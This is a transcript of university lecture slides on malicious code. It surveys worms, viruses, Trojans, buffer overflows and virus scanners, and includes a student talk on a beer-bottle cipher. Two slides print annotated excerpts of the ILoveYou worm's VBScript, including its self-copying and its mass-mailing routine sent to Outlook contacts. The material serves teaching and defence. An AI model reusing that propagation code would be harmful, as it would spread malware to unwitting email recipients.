1 / 51

David Evans cs.virginia/~evans

Lecture 17: Malcode. David Evans http://www.cs.virginia.edu/~evans. From http://cnnfn.cnn.com/2000/10/27/technology/microsoft/. CS588: Security and Privacy University of Virginia Computer Science. Menu. Examination of ILoveYou Code Malicious Code Taxonomy

eeaton
Download Presentation

David Evans cs.virginia/~evans

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Lecture 17: Malcode David Evans http://www.cs.virginia.edu/~evans From http://cnnfn.cnn.com/2000/10/27/technology/microsoft/ CS588: Security and Privacy University of Virginia Computer Science

  2. Menu • Examination of ILoveYou Code • Malicious Code Taxonomy • Beer Bottle Deciphering (Eric & Michael) • Malcode Defenses Overview • Virus Scanners University of Virginia CS 588

  3. LoveLetter.VBS • Excerpts on the manifest • This 328-line program caused ~$10B in damage • How much work and smarts was required? University of Virginia CS 588

  4. Smart people would convey more interesting message. Smart virus writers don’t include their contact information. This was smart – turn off scripting timeout in registry. (Dumb for Microsoft.) Main Loop rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next ... wscr.RegWrite "...Scripting Host\ Settings\Timeout", 0 sub main() ... Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") ... spreadtoemail() ... end sub University of Virginia CS 588

  5. Smart virus writers understand for loops. Smart virus writers can spell “mail”. spreadtoemail (edited to fit) sub spreadtoemail() for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = “ILOVEYOU” male.Body = “kindly check the attached LOVELETTER coming from me.” male.Attachments.Add(dirsystem& “\LOVE-LETTER-FOR-YOU.TXT.vbs”) male.Send x=x+1 next next end sub University of Virginia CS 588

  6. University of Virginia CS 588

  7. Be Very Afraid... • When really dumb people with no resources write malicious programs, it costs $10B. • What would happen if smart people with resources wrote a malicious program? • See manifest links: • Two interesting scenarios answering this • James Gleick article University of Virginia CS 588

  8. Attacking Malicious Code • “Malicious Code” is a bad name • Code has no intent • Programmer’s intent doesn’t matter, what the code does matters • As networks get more programmable, accidentally harmful code will become common • We’ll use “malcode” (mal = bad) • Its not a great name either... University of Virginia CS 588

  9. Taxonomy of Code All Code Harmless Code Malcode (occasionally programs are actually useful, too) Created by Malicious Author Accidental University of Virginia CS 588

  10. Taxomony of Malcode[Stallings, p. 502] Malcode Requires Host Program Independent Worms Logic Bombs Trojan Horses Viruses Trap Doors Insiders Self-Replicating University of Virginia CS 588

  11. Worms and Viruses • People get into stupid arguments over whether something is a “worm” or a “virus” • Is the Internet a host program? • See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988 • Is Outlook a host program for an email? • Similarly, for worms/viruses/Trojans • If the user must open it (e.g., ILoveYou) it is self-replicating? University of Virginia CS 588

  12. Trojan Horses • Greeks and Trojans at war • Eris (Discord), Paris, Aphroditie, Helen • Greeks attacking Troy, bombarded city for 10 years, but couldn’t get through city walls. • Pretended to leave, left big wooden horse as gift • Trojans brought horse into city (had to tear down part of wall to do this), got silly drunk celebrating victory. • Greeks jumped out, killed sentries, and let in Greek army. University of Virginia CS 588

  13. Modern Trojan Horses • User runs program that looks harmless • Program pretends to be “cool, dancing bears”, also erases your hard drive • Most attacks today are Trojan Horses • ILoveYou, Melissa, recent Microsoft attack, etc. • Rely on modern humans being as dumb as mythical Trojans • No matter how good your city/fire walls are, they don’t do any good if you can’t stop users from running random code University of Virginia CS 588

  14. Differences between Morris Worm 1988 and Melissa/ILoveYou 1999 University of Virginia CS 588

  15. Vulnerabilities Exploited • Morris Worm: • Buffer overflow: fingerd uses gets • sendmail debug mode • Weak Unix passwords • Melissa: • Word enables macros by default, no limitations on macro behavior • ILoveYou: • Dumb people will run code attached to email • Code Red/Nimda: • Buffer overflow in IIS University of Virginia CS 588

  16. Buffer Overflows int i; Frame Pointer int k; gets (s); Input more than 64 bits: gets just writes down stack bit 65: address of bit 66 on stack bits 66-...: instructions ... char s[64]; Return Address University of Virginia CS 588

  17. Preventing Buffer Overflows • Use run-time checks on all memory references • Safe languages (CLU, Java, Eiffel, etc.) • Safe libraries for C (don’t use gets, strcpy, etc.) • Separate code and data segments • Make code segment unwriteable (once application loaded), only allow jumps in code segment • Static analysis • Check binary or source code • But – about ½ of recent vulnerabilities are still buffer overflows! University of Virginia CS 588

  18. Replication Strategy • Morris Worm • Searched .forward files (should have used .rhosts) to find other hosts to attack • Used password guessing to break into other accounts • Used fingerd, sendmail vulnerabilites • Melissa/ILoveYou • Emails itself to entries in victim’s Outlook address book University of Virginia CS 588

  19. Damage • Morris Worm • Infected ~6000 computers (10% of Internet) • Melissa • Infected 1.2 Million machines in a few hours • ILoveYou • $10 Billion in damage • Nimda, CodeRed • ?? University of Virginia CS 588

  20. Outcomes • Internet Worm (Robert Morris, Jr.) • 3 years suspended sentence (no jail time), $10,000 fine. • Current occupation • Melissa (David Smith) (~$80m damages) • Plead guilty, Dec 1999 (second successful prosecution of virus author), link to plea agreement on manifest • Hired by Rutgers as Computer Technician while awaiting sentencing • ILoveYou ($10B damages) • Release without penalty, no laws in Philippines University of Virginia CS 588

  21. Responses • Morris Worm • Disconnect from network • Disorganized, phone • Anonymous message (probably from Robert Morris) explaining how to disable virus was not noticed or distributed • DARPA established CERT • Melissa • CERT Advisory, Eradicated quickly • But CERT had to rebuild Web server • ILoveYou • Many countries have since passed laws, Europe treaty announced last week University of Virginia CS 588

  22. Malcode Defenses • Prevent malcode from running • Limit damage it can do • Discourage attackers University of Virginia CS 588

  23. Malcode Defenses Today Next Monday • Prevent malcode from running Virus scanners – recognize known malcode Firewalls – drop incoming packets Code signing (only run code from trusted sources) Education – make users smarter • Limit damage it can do Sandbox (“Playpen”) – run malcode in protected virtual machine Reference monitors – enforce policy on execution Intrusion Detection, System maintenance • Discourage attackers Legal – pass laws to penalize attackers Earlier Your PS4’s Next Monday Dan Ortiz Weds University of Virginia CS 588

  24. Deciphering Rivest’s Beer Bottle Cipher Michael Neve and Eric Peeters

  25. The beer bottle cipher University of Virginia CS 588

  26. The beer bottle cipher 99 bottles of beer on the wall, 99 bottles of beer. Take one down, Pass it around, 98 bottles of beer on the wall. University of Virginia CS 588

  27. Plaintext Represented by a number A=01 , B=02 , … a “space”=00 Example: BEER IS LIFE 020505180009190012090605 1 digit = 1 bottle Here, the plaintext has 24 bottles. University of Virginia CS 588

  28. The wall The wall 5 3 8 5 … 9 8 5 3 8 5 … 9 8 3 3 K bottles of beer University of Virginia CS 588

  29. 4 1 8 8 … 4 6 5 What could I do with the other beers??? Bob K bottles of beer *(10*K+1) Keep only the K rightmost digit University of Virginia CS 588

  30. Drink it!!!! The procedure is complicated enough that you probably should not be drinking beer when you try to do it. Bob ??? University of Virginia CS 588

  31. Modulus This is equivalent to write: New_wall=old_wall*(10*K+1)mod10K Example: number on the wall = 537 sing "3 bottles of beer" move left-most bottle to right end new number on wall = 375 multiply by 31 (which is 10*3+1) result = 11625 new number on wall = 625 University of Virginia CS 588

  32. Inverted… Compute the multiplicative inverse for (10*K+1)mod10K H*(10*K+1)1 mod10K Then: New_wall*H mod 10K = old_wall Proof: New_wall=old_wall*(10*K+1) mod 10K New_wall*H mod 10K= old_wall*(10*K+1)*H mod 10K New_wall*H mod 10K= old_wall*1 mod 10K New_wall*H mod 10K=old_wall University of Virginia CS 588

  33. On the wall There is an encryption key, known as the "skull". Wall+skull Keep only the K right most digit New_wall=(old_wall + skull) mod 10K Example: number on wall = 625 sing "on the wall" skull = 7972340074652439987611087 sum = 7972340074652439987611712 new number on wall = 712 Inverted: (abs(new_wall – skull)) mod 10K=old_wall University of Virginia CS 588

  34. The wall 4 1 8 8 … 4 6 4 1 8 8 … 4 6 5 5 The wall The bone Take one down Don’t drink the bone… yet. University of Virginia CS 588

  35. The table Pass it around t empty (already…) glasses on the table 2 4 5 5 7 8 3 8 8 3 *10 +bigbone University of Virginia CS 588

  36. The table 8 7 5 4 8 1 7 4 5 8 5 Bigbone? It’s a t+1-digit number Each digit is the bone The new table has t+1 digit Repeat all steps until the wall is empty Ciphertext=table University of Virginia CS 588

  37. Work with Budweiser ??? We are not sure… University of Virginia CS 588

  38. Matlab program Example beer2('BUDWEISER','1654324617671695465416876154617861'); First Wall : 022104230509190518 "18 bottles of beer" Wall : 221042305091905180 New Wall : 008657221634837580 "on the wall" New Wall : 474074097789455441 "take one down" Bone : 1 New Wall : 47407409778945544 "pass it around" Big Bone : 1 10 x table : 0 New Table : 1 "17 bottles of beer" Wall : 74074097789455444 New Wall : 66670721996880924 University of Virginia CS 588

  39. Example Outcomes: Budweiser Table : 8316199728055301369 unbeer2(cipher,'1654324617671695465416876154617861'); New Table : 731619972805530137 Bone : 9 "1 bottles of beer" Wall : 8 New Table : 65384219502775236 Bone : 7 … University of Virginia CS 588

  40. Virus Scanners University of Virginia CS 588

  41. Virus Scanners • Compare code to a database of known malicious code • Smart authors create self-mutating viruses • Reasonably useful in days of “sneaker” net (viruses spread on floppies) • Reasonably useless when viruses spread as fast as email University of Virginia CS 588

  42. Virus Spreading • Read email every hour • Everyone’s address book contains 50 people • Infects 300M people in 6 hours! (For more complex model, see Wang/Knight/Elder paper on manifest.) University of Virginia CS 588

  43. Code Red University of Virginia CS 588

  44. Code Red University of Virginia CS 588

  45. What Virus Scanner Peddlers Do http://security.norton.com/ University of Virginia CS 588

  46. First, it tells you to lower your security settings to allow ActiveX. University of Virginia CS 588

  47. Always Click “Yes” During the download, you might see one or more messages asking if it is OK to download and run these programs. Click Yes when these messages appear. University of Virginia CS 588

  48. University of Virginia CS 588

  49. What it Should Do • Tell people who have ActiveX turned off, “Good Job” • Tell people who click “OK” to run their scanner (which accesses every byte on their disk) without checking its certificate that they are very vulnerable and should get an education! University of Virginia CS 588

  50. Malcode Summary • Best defense is education • Next best defense is a good offense • Tough legal penalties for convicted attackers • Doesn’t work against motivated foreign governments • Some Technical defenses next Monday • Virus Scanners • Firewalls, Intrusion Detection • Reference Monitors, Proof-Carrying Code University of Virginia CS 588

More Related